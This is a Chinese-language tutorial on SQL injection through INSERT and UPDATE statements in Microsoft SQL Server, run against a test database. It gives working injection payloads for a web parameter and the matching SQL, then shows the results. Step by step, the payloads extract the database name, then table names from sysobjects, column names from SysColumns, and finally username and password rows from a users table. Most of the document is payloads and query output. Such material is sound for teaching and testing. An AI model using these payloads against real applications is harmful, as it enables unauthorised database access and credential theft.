0x01 前言
UPDATE-INSERT的注入是一样的,这里演示的话,我就使用 INSERT 注入演示了
因为他们的注入都是修改某条数据/插入某条数据,然后我们去其他界面查看
0x02 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 获取库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?data='+db_name()+‘
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+db_name()+’’)
1> INSERT INTO article(title, content)VALUES('漏洞测试', ''+db_name()+'')
2> go
(1 rows affected)
# 当前库 = test
1> select * from article
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 5 | 漏洞测试 | test |
+----+-----------+-----------+
(3 rows affected)
0x04 获取表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
web语句: http://www.test.com/sql.php?data='+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)+’
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)+’’)
# 获取 1表
1> INSERT INTO article (title, content)
VALUES
(
'漏洞测试',
'' + (
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
) + ''
)
2> go
(1 rows affected)
1> select * from article
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 6 | 漏洞测试 | article |
+----+-----------+-----------+
(3 rows affected)
# 获取 2表
1> INSERT INTO article (title, content)
VALUES
(
'漏洞测试',
'' + (
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 2
) + ''
)
2> go
(1 rows affected)
1> select * from article
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 7 | 漏洞测试 | users |
+----+-----------+-----------+
(3 rows affected)
0x05 获取字段
注意:
OVER(Order by name ) 里面的 name 要修改为 test.dbo.SysColumns 表里面存在的一个字段
查询不同的表可以这样
例如:
Object_id(‘要查询的表名’)
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?data='+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1)+’
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1)+’’)
# users 表字段名称
1> select name FROM test.dbo.SysColumns Where id=Object_id('users')
2> go
+-----------+
| name |
+-----------+
| id |
| password |
| username |
+-----------+
(3 rows affected)
# 获取当前库 users表 第一个字段名称
1> INSERT INTO article (title, content)
VALUES
(
'漏洞测试',
'' + (
SELECT
TOP 1 name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.SysColumns
WHERE
id = Object_id('users')
) AS a
WHERE
a.row_number = 1
) + ''
)
2> go
(1 rows affected)
1> select * from article
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 8 | 漏洞测试 | id |
+----+-----------+-----------+
(3 rows affected)
# 获取当前库 users表 第二个字段名称
1> INSERT INTO article (title, content)
VALUES
(
'漏洞测试',
'' + (
SELECT
TOP 1 name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.SysColumns
WHERE
id = Object_id('users')
) AS a
WHERE
a.row_number = 2
) + ''
)
2> go
(1 rows affected)
1> select * from article
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 9 | 漏洞测试 | password |
+----+-----------+-----------+
(3 rows affected)
0x06 获取内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?data='+(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+’
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+’’)
# 查询users表 第一条数据
1> INSERT INTO article (title, content)
VALUES
(
'漏洞测试',
'' + (
SELECT
CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1
) + ''
)
2> go
(1 rows affected)
1> select * from article
2> go
+----+-----------+-------------------------+
| id | title | content |
+----+-----------+-------------------------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 10 | 漏洞测试 | 1 |test-user-01|123456 |
+----+-----------+-------------------------+
(3 rows affected)
# 查询users表 第二条数据
1> INSERT INTO article (title, content)
VALUES
(
'漏洞测试',
'' + (
SELECT
CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2
) + ''
)
2> go
(1 rows affected)
1> select * from article
2> go
+----+-----------+-------------------------+
| id | title | content |
+----+-----------+-------------------------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
| 11 | 漏洞测试 | 2 |test-user-02|234567 |
+----+-----------+-------------------------+
(3 rows affected)